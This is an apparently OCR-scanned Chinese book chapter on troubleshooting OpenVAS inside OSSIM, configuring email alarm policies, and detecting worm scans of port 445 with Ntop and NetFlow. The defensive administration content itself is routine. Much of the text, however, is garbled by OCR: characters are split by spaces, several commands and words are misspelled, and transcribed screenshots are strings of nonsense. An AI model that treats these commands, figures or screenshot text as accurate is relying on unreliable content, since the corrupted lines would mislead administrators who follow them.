无 论 采 用 独立 安装 Openvas 还 是 使 用 OSSIM 集成 的 OpenVAS, 在 使 用 过 程 中 都 会 遇 到 各 
种 问题 ， 当 然 前 者 遇 到 的 各 种 安装 和 编译 的 问题 会 更 多 ， 本 节 列 举 了 OSSIM 常见 的 使 用 故障 
并 给 出 解决 方法 。 


9.8.1 常见 OpenVAS 故障 三 则 
OpenVAS 故障 描述 如 下 : 


(1) 修改 Root 口令 导致 Openvas 无 法 启动 。 

由 于 用 户 修改 了 rot 账号 口令 ， 同 样 会 导致 OpenVAS 无 法 启动 ， 我 们 看 看 
/etc/ossim/server/config.xml 配置 文件 ， 口令 就 在 该 文件 中 。 如 果 修 改 了 root 口令 之 后 必须 使 用 
ossim-reconfig. 

(2) 使 用 alienvault-update 命令 对 系统 升级 之 后 ， 出 现 OpenVAS 无 法 正常 工作 。 

OpenVAS 的 故障 经 常 出 现在 升级 系统 之 后 ， 一 旦 出 现 此 类 故障 ， 我 们 立刻 查看 
/usr/sbin/openvasmd 进程 是 否 正常 启动 ， 若 没有 ， 则 重启 openvasmd。 如 果 是 数据 库 损坏 ， 那 
么 需要 重 构 数据 库 ， 方 法 如 下 : 

# openvasmd --backup 
#/etc/init.d/openvas-manager rebuild \\ 重 构 数据 库 
下 面 接着 重启 /etc/init.d/openvas-manager 服务 。 


# netstat -npl |grep openvas 

tcp 0 0 0.0.0.0:9391 0.0.0.0:* LISTEN 26976/openvassd: wai 

#openvasmd --slisten 127.0.0.1 --sport 9391 \\ 执 行 后 , 没有 任何 输出 代表 正常 \\ 
# netstat -npl |grep openvas 

tcp 0 0 0.0.0.0:9390 0.0.0.0:* LISTEN 708/openvasmd 

tcp 0 0 0.0.0.0:9391 0.0.0.0:* LISTEN 26976/openvassd: 


最 后 别 忘 了 执行 “ossim-reconfig” 命 令 ， 而 且 以 上 步骤 是 在 Server 上 操作 ， 而 不 是 在 


Sensor。 
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(3) 对 于 扫描 资源 池 之 外 机 器 的 问题 。 
OpenVAS 对 资源 池内 的 机 器 漏洞 扫描 正常 ， 而 自己 添加 的 其 他 机 器 扫描 会 出 现 故障 。 记 
以 我 们 要 完成 一 个 网 段 内 服务 器 漏洞 扫描 ， 首 先 要 将 机 器 加 入 到 OSSIM 资源 池内 ， 如 图 9-94 


所 示 。 


DASHBOARDS ANALYSIS 
园 19216811100  Host192168-11-100 locahost Router, Switch 一 一 一 aaosn2x 
WAP, Gereral Purpose. 
(Bria Router, 
园 sziesmios  Host192-16%-11-105 Sorapa nec m BD Ln/26x 
specel ded. eie 
Dese. Network Device. 
回 enaa Hos 192.168.1121 docamost Genera Purpose  m-K— 是 wnaowwme 
RÀ 1921680233 ——— Host19216811233 locahost Ges Pupo  am-——— = NetBSO/5X 
园 19216811235 Hos-192168- caos Genersi Purpose — amtttatm: Bunuvzex 
RÀ 1921681236 0o Most192-168-11:236 locos: CevesPupow ceo ar Windowsne 
192.168.1237 Most. 192-168-1123; locaiost. umm unknown 
RÀ) — 19216811238 Host19216811238 locaost ——X a wno? 
加 19216811239 Host-192-16811:239 Ilocahos = At Windows? 
RÀ genie izan  Most192-168-11.240 serveri = Qunwzsx 
园 nas menat — Qunmasx 
MO 19216811248 atenat — D Unag24x 
9116811222 MOS-IS16 1-242 — alenvautalemaut Aunmz6x 


如 图 9-94 所 示 ， 


@ 执行 
@ 执行 
@ 执行 


图 9-94 将 扫描 结果 加 入 数据 库 中 


RS REPORTS 


telnet. hap 
ssh hap hrpssi 
marpc netoios ssn 

netbios ssn, netblos 55n 
ssh nup. htp-ssl 


smp, nap msrp netos ssn, 
RE 


marpc netbozasn netbios-ssn, 
rep 


marpc netbios-ssn 


35h. top-hetp, 9390/tcp 


ssh, nup, hasst nop-htp, mysg, 
Soep 


选择 UPDATE DATABASE VALUES 按钮 ， 更 新 数据 库 。 接 下 来 ， 就 可 对 其 
中 的 机 器 漏洞 扫描 。 对 于 上 面 介绍 的 解决 方法 可 有 效 处 理 该 问题 ， 除 此 之 外 还 可 执行 以 下 命令 : 


“/usr/share/ossim/scripts/vulnmeter/fix_openvas_plugins.sh” 
“/usr/share/ossim/scripts/vulnmeter/openvas_rebuild.sh” 
“perl /usr/share/ossim/scripts/vulnmeter/updateplugins.pl" 


在 操作 过 程 中 还 可 能 出 现 的 故障 现象 如 图 9-95 所 示 。 


192.168.11.99 localhost 


Scanner IP 


192.168.11.99 


v 192.168.11.99 [localhost] v v 


Scanner connection 


@ Trane o connect to vunerabiity 


scanner. If the system has been 
updated recently the vulnerability 
scanner is rebuilding its databaso. 
Please wait a few minutes. 


9-95 ”报告 连接 故障 


van ox 


Nessus 的 守护 进程 的 监听 端口 是 TCP 1241 端口 ， 而 OpenVAS 就 是 TCP 9390 端口 ， 出 现 
这 种 报错 信息 ， 主 要 是 9390 端口 不 在 监听 状态 ， 我 们 可 以 查找 openvasmd 进程 确认 它 是 否 启 
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动 。 如 果 没 有 启动， 需要 启动 一 下 。 如 果 直 接 启动 也 没有 办 法 监听 9390 端口 ， 我 们 应 该 怎么 
办 ? 首先 ， 重 建 数据 库 。 


#/etc/init.d/openvas-manager rebuild 
Rebuilding the NVT cache 


大 约 5-10 分 钟 后 重建 完成 ， 这 时 重启 openvas-manager 服务 。 


#/etc/init.d/openvas-manager restart 


(4) Sensor 5 Server 通信 故障 导致 OpenVAS 无 法 正常 工作 。 
这 种 情况 的 典型 代表 是 出 现 “Failed to authenticate” 验 证 失败 ， 如 图 9-96 所 示 。 


TARGET INVENTORY TARGET ALLOWED 


& 

SENson att Vui ScANNER Nuapscan toaD | O 

192168120130  aliemvaut * 192.168.120.130 [alienvauit] * v v o% 3 
SCANNERIP 


9-96 ”连接 认证 故障 
在 OSSIM 系统 中 使 用 漏洞 扫描 有 时 会 出 现 图 9-97 所 示 问 题 ,图 9-97 表 示 Sensor 无 法 和 Server 


通信 截图 ,注意 看 在 Active Sensors 显示 为 0， 即 代表 异常 。 启 动 扫描 进程 ， 我 们 首先 用 netstat -na 
检查 ， 这 时 发 现 TCP 40001. 40002 全 都 不 在 监 昕 ， 查 看 Sensor 状态 是 不 正常 ， 出 现 “Connection 


refused” 表 示 Sensor 无 法 和 OSSIM Server 通信 ， 所 以 首先 调整 Sensor 工作 状态 使 其 正常 。 


COMPONENTS  SCHEOULER LOCATIONS 
ALIENVAULTCENTER | SENSORS | SERVERS 
571) ZI h 
192168N219 m 1 s æ so x 
ft ALIENVAULT CENTER 
ALIENVAULT COMPONENTS INFORMATION 
NAME $ STATUS a RAM USAGE SWAP USAGE CPU USAGE 
国 
& 是 " 


9-97 Sensor 通信 故障 
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扫描 时 间 很 短 是 另 一 种 扫描 错误 ， 这 时 会 出 现 “Failed Service temporarily down” 的 提示 ， 
我 们 需要 重 构 漏 洞 库 ， 并 重启 openvasmd-manage 服务 ， 如 图 9-98 所 示 。 


Bees esw olsozzyoz3e 


这 时 发 现 一 个 现象 ，TCP 9390 和 9391 端口 都 不 在 监听 状态 ， 与 此 同时 ， 启 动 
Openvas-scanner 服务 出 现 报错 ， 如 图 9-99 所 示 。 


ET s-manager start 
starting OpenVAS Manager: E 
alienuvault:"# /e i scanner start 


Starting OpenVAS 
alienvault: ## 


图 9-99 Openvas-scanner 启动 报错 


在 这 种 故障 情况 下 ， 伴 随 出 现 如 下 报错 日 志 ， 下 一 小 节 会 接着 对 这 种 故障 进行 详细 分 析 。 

alienvault:~# tail -f /var/log/openvas/openvasmd.log 

lib serv:WARNING:2014-07-03 06h18.00 utc :25307: Failed to gnutls bye: 
GnuTLS internal error 

lib serv:WARNING:2014-07-03 06h18.00 utc :25307: Failed to gnutls bye: 
Error in the push function 


9.8.2 OpenVAS 故障 分 析 

OpenVAS 扫描 过 程 分 为 两 个 阶段 ， 首 先是 端口 扫描 阶段 , 在 该 阶段 OpenVAS 对 扫描 范围 
内 所 有 目标 判断 是 否 在 线 ， 然 后 扫描 端口 ， 接 下 来 是 探测 阶段 ， 在 该 阶段 OpenVAS 需要 确定 
目标 操作 系统 类 别 和 开发 服务 器 和 应 用 类 别 , 最 后 再 调用 相应 漏洞 插件 对 其 进行 深度 扫描 。 在 
OpenVAS 服务 器 端 ， 可 以 分 为 5 个 模块 ， 其 工作 流程 如 图 9-100 所 示 。 


o 主 控 模 块 : 负责 控制 调用 各 个 子 模块 ， 它 根据 客户 端 配置 信息 调用 相应 的 扫描 数据 库 


脚本 。 

€ ”认证 模块 : 对 客户 端 提交 的 用 户 名 和 密码 进行 认证 校 验 ， 主 要 是 对 用 户 名 和 密码 进行 
*3. 

@ ”日志 模块 : 记录 日 志文 件 ， 它 将 用 户 登 录 信息 ， 扫 描 信息 以 及 特征 库 更 新 信息 写 入 日 


© ”扫描 模块 : 根据 用 户 的 相关 设置 ， 扫 描 模 块 调用 扫描 数据 库 组 装 好 相应 数据 包 ， 发送 
到 目标 操作 系统 或 应 用 ， 与 漏洞 数据 库 中 的 漏洞 特征 进行 比较 分 析 以 判断 所 选 漏洞 
是 否 存在 。 

€ ”加密 模块 : 负责 对 服务 器 和 客户 端 之 间 进 行 通信 加 密 ， 确 保 数据 传输 安全 。 
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< , memos: 
| 进行 加 密 | 
图 9-100 ”模块 间 的 工作 流程 

OpenVAS 这 种 扫描 漏洞 库 中 ， 内 部 含有 上 代码 ， 因 此 扫描 时 会 包含 一 些 类 似 黑 
客 攻 击 的 扫描 行为 ， 并 且 OpenVAS 服务 器 可 以 远程 启动 和 控制 ， 因 此 用 户 必 须 对 扫描 服务 器 
组 件 的 安全 加 密 进 行 设置 。 首 先 由 openvas mkcert 创建 证 书 (为 OpenVAS ^ SSL 证 书 ， 存 
储 在 /var/lib/openvas/CA/)， 在 启用 了 加 密 模 式 后 ， 要 想 正 常 使 用 OpenVAS， 还 必须 为 系统 指 
定 用 户 ( 用 户 名 是 OSSIM)， 以 及 一 次 性 口令 (这 里 是 用 星 号 表示 )， 该 口令 只 在 用 户 第 一 次 
登录 的 时 候 使 用 ， 一 旦 OSSIM 用 户 登录 成 功 ， 客 户 端 就 向 服务 嚣 端 发 送 公 开 密 钥 ， 通 过 这 个 
密 钥 唯一 标识 用 户 ， 所 以 下 次 用 户 自 动 登录 时 就 无 须 输入 口令 


1. 故障 排除 方法 一 
(1) 查看 证 书 ， 如 图 9-101 所 示 操 作 。 


alienvault:/var/lib/openvas/mgr# openvas-nkcert-client -n om -i 
ting RSA private key, 1024 bit long modulus 


ked to enter information that will be incorporated 
quest 
* about to ente; what is called a Distinguished Mame or a DM. 
quite a feu fields but you can lea! ome blank 
11 be a default ualu 


Country Mame (2 le : :State or Province Name (full name) [Some-State]:Locality Nane (eg, 
city) []: * (eg, company) [Int dgits Pty Ltdl:Organizational Unit Mane (eg, 


"ction) [1:Common : e Or y "r's hostname) [1:Email Address [1 ng configura 
tion from /tmp/ope "nt .31786/st 

Check that the reques s the signature 

jignature ok 


follows 


3 06:51:08 2015 GMT (365 days) 


database uith 1 neu entries 
e Updated 
added to Ope: 


图 9-101. 查看 Openvas 证 书 


alienvault:/var/lib/openvas/mgrf openvasmd -backup 


(2) fiib openvas-manager. openvas-scanner. openvas-administrator 三 个 服务 。 
(3) 删除 tasks.db 数据 库 文件 。 


#rm /var/lib/openvas/mgr/tasks.db 
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(4) 重建 数据 库 


# openvasmd --rebuild -v (重建 数据 库 ) 
#cd /usr/share/ossim/scripts/vulnmeter 


C6) 更 新 。 


#perl updateplugins.pl migrate 


正常 情况 下 TCP 9390、9391 端口 都 处 于 监听 状态 ， 如 图 9-102 所 示 ， 则 Sensor 处 于 活动 


0 0.0.0.0:9390 € 0.0: LISTEI 9586/openvasnd 


0 0.0:9391 0.0.0.0:» 9819/openvassd: uai 
0 127.0.0.1:9393 0.0.0.0:* LISTE 4199/openvasad 
:musrybint _ 


图 9-102 查看 9390 等 各 端口 状态 
(6) 最 后 ， 重 新 开始 扫描 目标 机 器 。 
在 正常 时 ， 日 志 显 示 如 下 : 


#tail -f /var/log/openvas/openvasmd.log 
event auth:MESSAGE:2014-07-03 06h16.06 utc :25106: Authentication success for 
user ossim (e015fbaf-7e65-4f05-adbb-2e400b96e620) 


2. 故障 排除 方法 二 
如 果 还 未 解决 问题 ， 可 以 采用 以 下 方法 。 


#openvasad -c remove user -n ossim \\ 操 作 效果 如 图 9-101 所 示 。 
#openvasad -c add user -n ossim -r Admin 


提示 : 该 命令 用 来 设 定 管理 员 账 号 ， 目 的 是 添加 一 个 管理 员 和 角色 的 OpenVAS 登录 用 户 ， 


执行 时 会 跳出 要 设 定 admin 账号 的 密码 的 提示 ， 如 果 想 更 改 管理 者 账号 名 称 ， 需 要 将 该 行 中 
的 小 写 admin ， 改 成 想 要 的 账号 名 称 。 如 图 9-103 所 示 。 接 着 ， 在 Web UI 中 输入 新 口令 。 


图 9-103 添加 用 户 


下 面 在 终端 验证 是 否 修改 生效 : 
alienvault:~# openvasmd --database-/var/lib/openvas/mgr/tasks.db 
--slisten-127.0.0.1 --sport-9391 --listen-127.0.0.1 --port-9390 


如 果 没 有 任何 报错 信息 ， 则 代表 设置 成 功 。 下 面 开 始 Web UI 设置 ， 分 为 以 下 几 个 步骤 : 
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首先 选择 Configuration Deployment Components, 然后 选择 当前 的 主机 ,例如 alienvault, 


如 图 9-104 所 示 。 


DASHBOARDS ANALYSIS ENVIRONMENT REPORTS 
O = 


TEE 
E ae pe qe o d 
= E I J- a 


9-104 选择 某 台 OSSIM 主机 
收集 系统 状态 和 内 存 、CPU 信息 可 能 需要 一 段 时 间 ， 待 收集 完成 就 会 呈现 带 颜 色 的 实体 
图 标 。 接 下 来 ， 我 们 选择 Sensors 按钮 ， 选 择 当前 OSSIM 的 IP 地 址 ， 如 图 9-105 所 示 。 然 后 
在 弹出 对 话 框 中 找到 Services 栏 , 输入 用 户 ossim 的 口令 , 最 后 单 击 UPDATE 按钮 , 如 图 9-106 


所 示 。 接 下 来 ， 即 可 以 正常 操作 。 


DEPLOYMENT 
LOCATIONS 


COMPONENTS SCHEDULER 


| SERVERS 


ALIENVAULT CENTER SENSORS 


m " 


ie PRIORITY — PORT 


5 420 


9-105 选择 一 台 OSSIM 


SERVICES 
Nacios wroe VULN SCANNER KISMET ACTION 
E 口 


VULN SCANNER OPTIONS 


User. 


Password: 


Port 


Max Simultaneous Scans- =@ 


图 9-106 输入 口令 
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配置 OSSIM 报警 


9.9.1 基本 操作 
(1) 首先 登录 admin 控制 台 ， 选 择 Configuration Administration Main, YE Tickets 选项 
中 ， 选 中 “Mail Server Configuration Settings” 选 项， 如 图 9-107 所 示 ， 这 里 可 以 设置 SMTP 
服务 器 地 址 和 发 送 端口 以 及 用 户 名 和 密码 等 信息 。 然 后 在 Ticket 选项 中 选择 Tickets parameters 
选项 ， 设 定 Send email notification 为 “Yes”， 默 认 每 天 最 大 发 送 邮 件数 量 为 15 个 ， 可 以 根据 
自己 需要 修改 。 
sl Ke, V El X 


DASHBOARDS ANALYSIS ENVIRONMENT REPORTS CONFIGURATION 


ADMINISTRATION 


ADMINISTRATION 
DEPLOYMENT 
USERS | MAIN 


THREAT INTELLIGENCE 


Edd EIN C 


TUB Sgt 
Open Tickets for new alarms automatically? very] o 
send email notification ul o P 
Maximum days for emall nosification s o 
Email Template for tickets clik bere o 


w 
图 9-107 查看 /更 改 Ticktes 设置 


在 Email Template for tickets 一 栏 还 可 以 定制 发 送 邮 件 模板 ， 如 图 9-108 所 示 。 


usens MAIN BACKUP 


TERRE 


Tem piste Labela = = = 
iD E b NR fuam modes] PEIORITY STR. ILE 


n3 
INCIDENT. NO sce 

TITLE 

EXTRA INFO 

IN CHARGE NAME 了 I) 


pero i : 
INCHARGE COMPANY Incident details 
Title: INCIDENT. NO - TITLE 
-iy Status: STATUS 
Type: CLASS -TYpE 
Pri UM (PRIORITY. STR) 


NI 
RGE NAME 
N DATE (LIFE TIME ago) 


Urt TIME. 
ImicxET DESCRIPTION 
[RCKET-ACTION 
[TICKET AUTHOR NAME 


m 


Tr Me Extra info: 
[PCKET-INvEnse. msroav 
Dana nro 


EXT 
9-108” 自 定义 邮件 模板 
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(2) 编辑 /etc/ossim/ossim_setup.conf 配置 文件 ， 按 下 列 格式 修改 ， 注 意 域名 test.com 为 示例 。 


检查 /etc/postfix/main.cf 的 配置 是 否 正确 。 
(3) 重启 服务 : 


(4) 测试 邮件 : 


(5) 在 Intelligence 一 Policy & Actions 菜单 中 创建 策略 和 动作 ， 如 图 9-109 所 示 ， 详 细 操 
作 在 下 面 的 例子 中 给 出 。 


= Default Policy Group: Default Group Policy objects ! | 
加 New Modify =) Deleteselected  . Duplicate selected | Reload Polices A, Enable/Disable policy 
Situs Ori Mame Source 4 Destination 9 SourcePort DewtPort  fventlypes Sensors  TimeRange Targets SIEM SetPrior RakA Logis Crow. SQL Storag 


T e ANY AW J ANY Aca? eraut = 
7 E amn di Fl EZ EX * .- * s g 


ADA EE 


Actions Displaying 1 to 1 of 1 Actions Jaa 


New ,;Modfy .., Delete selected 


m 第 二 部 设 定 报警 动作 
Name Type Description 


9-109 配置 邮件 报警 


(6) 日 志 测 试 


9.9.2 ”实例 


下 面 的 例子 主要 目的 是 设置 发 送 SSH 登录 告警 提示 ， 我 们 知道 OSSIM 策略 ， 如 图 9-110 
所 示 ， 那 么 系统 策略 分 为 三 种 ， 分 别 是 : 
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€ Default Policy Group: 默认 组 策略 ; 
€ AV Default Policy: Alienvault 默认 策略 ; 
€ Policies for events generated in server: 事件 产生 策略 。 


i Jt 加 B X 


DASHBOARDS ANALYSIS ENVIRONMENT REFORTS RATION 
HREAT INTELLIGENCE ADMINISTRATION 
DEPLOYMENT 
POUCY | ACTIONS poms omecves  COUPLANCEN ATION DATASOURCE —— TAXONOMV Eee 
= Default Policy Group: Default Group Poilcy objects it 
it 


© AV Default policies: Alter events from AllenVaufr avapi user 


= Policies for events generated in server: alenveult (10.32 14.133) 


图 9-110 ”默认 策略 


m 当 修改 策略 后 需要 重启 服务 ， 方 可 生效 ! | 


以 下 操作 以 OSSIM 4.8 平台 为 例 ， 首 先 在 Web 界面 下 选择 Configuration 一 Threat 
Intelligence 开始 新 建 一 个 策略 ， 如 图 9-111 所 示 。 
al fet "8 B X 


CONFIGURATION 


THREAT INTELLIGENCE © 
*T 


a Detay Foley Group: Default Group Policy otyecrs 
Dupe sacred 3 tekad Poioes A, Enabie/Disabie poly 


图 9-111 新 建 策略 
一 条 策略 包含 两 个 部 分 : 条 件 和 行动 ， 可 以 形象 地 比喻 为 “If That, Then This ”。 策 略 主要 
就 是 调整 Conditions (条件 ) 和 Consequences (R) 选项 的 内 容 。 网 络 分 析 师 可 以 通过 策略 


发 现 、 捕 获 网 络 中 各 种 故障 。 
首先 ， 选 择 SOURCE ( 源 地 址 ) 和 DEST (目标 地 址 )， 然 后 可 选择 一 个 或 多 个 DS 组 或 


插入 一 个 新 数据 源 ， 接 着 选择 INSERT NEW DS GROUP 按钮 ， 弹 出 如 图 9-112 所 示 的 画面 。 


[Znen] i Modty L) Delete selected 
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THREAT INTELLIGENCE 


FOUCK | ACTIONS PORTS  DIRECTVES  COMPLIANCEMAPPING  CROSSCORRELATON DATASOURCE TAXONOMY KNOWLEDGE BASE 
Foley Rule vum aw ë ]* aet © Yn Oto serenus [efu Ponve — — [v 
conpmous 
om DT Ctr. — DerUSy msy FOIWARDIM: v 
EE Torwart cvems (vo) 
» roucr conomons © ADD MORE CONDITO 


司 | 司 SSS 


DESTINATION 
SOURCE PORTS 
DEST PORTS 
EVENT TYPES 


SOURCE 


图 9-112 添加 新 的 数据 源 (DS) 


我 们 可 以 在 列表 中 选择 数据 源 ， 如 果 没 有 找到 , 还 可 以 在 右 侧 搜 索 栏 键入 数据 源 名 称 , 例 
如 SSH， 当 选择 完毕 后 ， 单 击 “ 添 加 数据 源 ” 按 钮 ， 如 图 9-113 所 示 。 


INSERT NEW DS GROUP? 
GROUP NAME DESCRIPTON 
HERIGSE 
a Click eo the dots soarce to add o che fat t 
sides 
DATA SOURCE DATASOURCE NAME è 

na sensn 

am =» 
DATA SOURCE. DATA SOURCE NAME DATA SOURCE CESCRIPTON / EVENT TYPES 


图 9-113 添加 数据 源 
下 面 ， 我 们 可 以 选择 添加 动作 (Actions)， 单 击 插入 新 动作 (Insert new action). 按钮 ， 如 
图 9-114 所 示 。 添 加 完成 后 下 面 开始 设置 邮件 。 
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-— — 
SD , 
* B iS 
— 
ince Marerom 

nud à a 
e 
z 
r $ 
i gi 
E 9z 
3 33g 
< "liu 


图 9-114 插入 动作 
最 后 保存 以 更 新 策略 , 单 击 Reload Policies 按钮 重新 加 载 策略 , 如 图 9-115 箭头 所 示 位 置 ， 
此 时 基本 设置 完毕 , 当然 有 关 策 略 的 设置 方法 和 技巧 , 还 不 止 这 些 , 更 多 技巧 等 待 大 家 去 发 现 。 


EDIT POLICY GROUPS. 


à Default Policy Group: Default Group Policy objects 
New 局 oa ij peete selected o Dupkateselctd BRebad Policies A EmaMe/Disabie poicr. 


STATU. ORD- NAME source e DESTINATION 中 SOURCEPONT OESTPORT — EVENTTYPES SENSORS TIVE RANGE TARGET — Sit. 


EOS sd Senna ELT Pm r : D5 Groups: D gom Sewer o 
D L | | à. | | i L "t e 


9-115. 重新 加 载 策略 


J. OSSIM 在 蠕虫 预防 中 的 应 用 


蠕虫 的 传播 会 消耗 大 量 的 网 络 链 路 可 用 带宽 , 造成 网 络 的 不 稳定 甚至 瘫痪 。 我 们 用 常规 技 
术 虽 然 不 能 彻底 根除 蠕虫 ,但 我 们 可 以 采取 措施 将 其 影响 尽量 缓解 , 从 而 保证 网 络 的 稳定 运行 。 
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9.10.1 多 维度 分 析 功 能 

通过 OSSIM 提供 的 开源 软件 从 多 维度 、 多 技术 的 视角 发 现 蠕虫 攻击 ， 以 及 感知 前 期 APT 
的 攻击 行为 , 包括 对 数据 包 的 审计 , 进行 数据 包 深度 内 容 分 析 , 异常 行为 分 析 , 攻击 事件 分 析 ， 
时 间 线 分 析 以 及 日 志 分 析 等 大 数据 处 理 。 特 别 是 通过 OSSIM 内 的 智能 事件 关联 分 析 引擎 ， 能 
够 做 到 攻击 确认 、 事 件 关联 可 疑 发 现 、 因 果 溯 源 的 功效 ， 如 图 9-116 所 示 。 通 过 时 间 线 (Time 
Line) 分 析 可 以 了 解 单位 时 间 内 里 虫 爆发 频率 。 


Ntop 发 现 大 量 小 包 
" 存在 


Ju Ntop 发 现 , 小 于 性 © 
多 在 Web UI 首页 64 池 节 包 占 总 量 地 


友 现 Alarm 报 警 的 80%， 符 合 里 


Netiow RRE k 
c 流量 特征 d 
TESIEMP Sz ME / VEN Susp hi 
触发 报警 量 特征 


snort: "ET SCAN 
Behavioral Unusual Port 
445 traffic, Potential Scan 
or Infection" 


9-116 通过 OSSIM 多 维度 发 现 蠕虫 攻击 


9.10.2 ”发 现 异常 流量 

我 们 知道 利用 Cisco NetFlow 所 采集 和 输出 的 网 络 流量 的 统计 信息 ， 可 以 发 现 单个 主机 发 
出 超出 正常 数量 的 连接 请 求 , 这 种 大 量 异常 的 流 ,往往 是 蠕虫 爆发 或 网 络 滥用 的 迹象 。 因为 里 
虫 在 发 作 时 会 扫描 大 量 随机 IP 地 址 ， 来 寻找 可 能 的 目标 ， 会 产生 大 量 的 TCP、UDP 或 ICMP 
流 。 尽 管 NetFlow 不 能 对 数据 包 做 出 深层 分 析 ， 但 是 已 经 有 足够 的 信息 来 发 现 可 疑 流量 。 
NetFlow 记录 非常 适用 于 早期 的 蠕虫 或 其 他 网 络 滥用 行为 的 检测 。 利 用 这 种 方法 ， 一 般 在 几 分 
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钟 内 就 能 跟踪 到 其 源头 的 IP 地 址 、MAC 地 址 、 所 连接 的 交换 机 和 端口 号 信息 ,最 后 将 其 端口 
关闭 隔离 。 


9.10.3 ”蠕虫 分 析 

下 面 再 分 析 个 实例 , 如 果 一 个 主机 使 用 端口 445 连接 到 5 个 不 同 的 主机 上 , 这 可 能 是 一 个 
正常 的 行为 。 如 果 它 连接 到 15 个 主机 ? 我 们 开始 觉得 可 疑 。 如 果 它 们 在 很 短 时 间 内 , 连接 100 
个 不 同 的 主机 呢 ? 确认 这 种 攻击 变 得 更 加 可 靠 。 在 OSSIM 显示 面板 中 ， 可 以 将 日 志 分 类 中 发 
送 日 志 最 多 的 前 10 位 列 出 来 , 以 引起 管理 人 员 的 注意 ,如 图 9-117 所 示 。 这 里 我 们 关注 Malware 
类 的 所 有 日 志 信息 ， 要 了 解 图 中 其 他 各 种 分 类 ， 可 在 Configuration 一 Threat Intelligence 一 
Taxonomy 一 Categories 中 可 查看 详情 。 


DASHBOARDS ANALYSIS ENVIRONMENT 


OVERVIEW 
EXECUTIVE TICKETS SECURITY TAXONOMY NETWORK VULNERABILITIES REAL TIME 
SIEM: TOP 10 EVENTS BY PRODUCT TYPE = > SIEM: TOP 10 EVENT CATEGORIES 

20% 

10% 
21%, 
77% 
45% 


9-117 按 日 志 类 别 分 类 显示 Top 10 
经 过 观察 详细 日 志 ， 立 即 能 够 发 现 日 志 的 风险 等 级 都 比较 高 。 


Er Top10 Events by ProductType” 和 “Top 10 Event Cotegories” 表 达 的 含义 有 何不 同 ? 
这 些 都 是 基于 分 类 的 比较 。 而 且 它 们 之 间 也 有 共性 ,也 就 是 同一 类 事物 往往 会 具有 更 多 的 
近似 特性 ， 如 果 查 看 插件 ， 它 们 有 产品 型 号 参数 ， 再 查看 插件 中 的 SID， 它 们 有 事件 类 型 
和 子 类 型 。 就 像 在 OSSIM 中 把 报警 Alarm 这 类 事件 又 细 分 为 Attacks、Bruteforce、Dos、 
Misc、Network、Scan 等 若干 子 类 一 样 。 
总 的 来 说 , 这 些 只 是 重 在 用 不 同 的 方法 去 分 析 相 同类 型 的 信息 , 都 是 分 类 和 编码 日 志 消 息 
含义 的 一 种 手段 ,这 就 好 比 在 生物 学 中 将 不 同 生物 的 不 同 特 征 归属 于 不 同 界 、 门 、 纲 、 目 、 
科 一 样 。 
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对 于 扫描 Windows 主机 445 端口 ， 这 种 蠕虫 的 攻击 日 志 发 送 得 非常 频繁 ， 我 们 可 以 用 下 
面 讲 到 的 时 间 线 分 析 法 来 分 析 ， 打 开 某 一 个 日 志 能 够 看 到 里 面 记录 的 细节 ， 如 图 9-118 所 示 。 


Date Allenvault Sensor Interface 


2013-06-01 2109 34 CMT-4 00 


Category Sub-Category 
Normalized pon 4 » Aum s 
C Product Type. Data Source 10 
Aarm 1505 
Source Port Destination Address Destination Port Protocol 
ans 19116111 186 as To 
e; Assas +0 Promy Reliability sk 
ERR mm umm gs 


Context erent Context information so 


^ AlienVault Incident Response: Alarm ‘Tironom] 


Kot. 
> AN-FREE Network scan, local host scanning port 445/TCP on SRC IP [Directive] 


Raw Log. 


图 9-118 扫描 445 端口 的 日 志 


从 图 9-119 可 知 , 触发 这 类 事件 的 特征 是 针对 目标 计算 机 的 445 端口 的 扫描 ,而且 目 的 IP 
地 址 为 随机 分 布 ， 持 续 时 间 达 到 48 分 钟 ， 所 以 风险 等 级 这 里 为 3 级 ， 图 中 用 绿色 方 框 表示 出 
来 ， 如 果 Risk 等 级 上 升 ， 系 统 会 用 红色 方 框 表示 出 来 。 


> Apply label to selected alarms. 


ee Ø View Grouped I 
» Tekets 
H Signature Events Rish Duration Source Desination status 
» Knovietge DB -" es we pe 
Analysis AV-FREE-FEED Network scan, local host scanr 
inim a rope - IB T92168 150.2144044 153101.169 162meroson.as ill open 
STC? on 192.168.150.214 
Reports 
AV.FREE FEED Network scan, local host acan : 
ti exe EMI. ur 
aka Assets AASITCP on Host-000c8128edd2 
AV.FREE FEED Network scan, local host scan t 
Ynteligence g maae E! 19 mns Host O00c826edd22153 9 7342202220 mirosots M open 
ABITC? on Host 000c8t2edd2 
Le Situational Awareness  AV-FREE-FEED Network scan, local host scanning port. 
a n Amia Host O00ca28e022893 9 197.21.118 162microsofds E open 
Maarcp on Hostooocapaeddz 
JÉ Deployment 
ag 
Dele ALL alarms 


从 Delete selected 目 Close selected 


图 9-119 deduc 
9.10.4 流量 分 析 


当 蠕 虫 爆发 时 ， 在 流量 、 协 议 以 及 数据 包 大 小 分 布 上 都 会 与 平时 不 同 ， 此 时 可 以 借助 于 
OSSIM 系统 中 的 Ntop 流量 监控 软件 来 协助 分 析 问 题 。Ntop 的 部 分 截图 如 图 9-120 所 示 。 
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EXE & ——OSSIM RIE 


Shortest 42 bytes 
Average Size 244 bytes 
Packets. Longest. 20,484 bytes. 
Size <= 64 bytes 70.99. 5,357,610 
64 < Size <= 128 bytes 61% 460,297 
128 < Size <= 256 bytes 20% 150,787 
256 < Size <= 512 bytes 1.0% 75,035 
512 < Size <= 1024 bytes 47% 356,202 
1024 < Size <= 1518 bytes 153% 1,158,700. 
Size > 1518 bytes 0.0% 624 


Packets too long [> 1514] 0.0% 624 
Bad Packets (Checksum) 0.0% 0 
Total 2.2 GBytes [7,559,255 Pkts] 
IP Traffic 2.2 GBytes [7,017,970 Pkts] 
Fragmented IPv4 Traffic 010.0%] 
Non IPv4 Traffic. 36.0 MBytes 


图 9-120 Ntop 检测 到 数据 包 大 小 分 布 


如 图 9-121 所 示 ， 从 图 中 的 统计 信息 可 以 查看 到 ， 流 量 分 布 基本 正常 ， 数 据 包 中 64~127 
字 节 的 数据 包 数 约 为 1024~1518 字 节 数据 包 数 量 的 3 倍 ， 这 说 明 当 这 种 蠕虫 爆发 时 ， 网 络 中 
小 包 数 量 过 多 ， 而 且 SYN 连接 数量 非常 大 。 从 主机 信息 上 观察 ， 会 发 现 很 多 防 生 IP， 这 些 都 
是 虚假 IP。 


Host Information 


Traffic Unic[Byios V] 
supner [A v] 


192.168.150.114 Oe 
192.168.150.200 P &€ 
192.168.150.115 P 


192 168 150 114[00:0C-2975:70:46 
